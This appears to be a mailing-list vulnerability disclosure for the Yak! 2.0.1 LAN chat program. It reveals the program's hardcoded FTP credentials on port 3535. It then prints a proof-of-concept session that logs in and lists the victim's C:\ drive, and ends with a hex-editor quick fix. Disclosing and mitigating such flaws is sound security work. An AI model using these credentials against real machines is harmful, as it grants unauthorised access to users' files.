<<< Date Index >>>     <<< Thread Index >>>

Yak! 2.0.1 file trasfer exploit




http://www.digicraft.com.au/yak/

yak 2.0.1 is a software for chattin in lan environment for windows

it supports file transfers. the default port it listens is 3535.
connecting at 3535 

telnet localhost 3535 gives up nice :

        " 220 ICS FTP Server ready. "

meaning for file transfers ftp is being used. but the real pain starts when 
just by listening with a sniffer it was found ...

             username : Yak
             password : asd123

and logging in with this credentials gives almost full permission to the users' 
filesystem.

======================PoC========================

ftp> open localhost 3535
Connected to desktop.
220 ICS FTP Server ready.
User (desktop:(none)): Yak
331 Password required for Yak.
Password:
230 User Yak logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
C:\TEMP\*.* not found
226 File sent ok
ftp: 23 bytes received in 0.01Seconds 1.53Kbytes/sec.
ftp> cd ..
250 CWD command successful. "C:/" is current directory.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw-   1 ftp      ftp            0 Aug 07 19:58 CONFIG.SYS
-rwxrwxrwx   1 ftp      ftp            0 Aug 07 19:58 AUTOEXEC.BAT
drw-rw-rw-   1 ftp      ftp            0 Sep 08 00:42 yak201
-r--r--r--   1 ftp      ftp    783764060 Sep 04 01:05 AVSEQ00.DAT
-r--r--r--   1 ftp      ftp    793687148 Sep 04 02:27 AVSEQ01.DAT
-rw-rw-rw-   1 ftp      ftp          217 Sep 09 11:53 bil.reg
drw-rw-rw-   1 ftp      ftp            0 Aug 07 21:03 Program Files
drw-rw-rw-   1 ftp      ftp            0 Aug 09 01:39 test
drw-rw-rw-   1 ftp      ftp            0 Aug 30 10:17 Norton AntiVirus
226 File sent ok
ftp: 594 bytes received in 0.00Seconds 594000.00Kbytes/sec.
ftp>

======================PoC========================

QUICK FIX :
-----------
            with a hexeditor i found "asd123" <- the password 
at offset :  
                A5B40
                A5E81

changing the 6 char password to anything else like -> "asX12X" may
be a quick fix. 

also the username changing should result the same.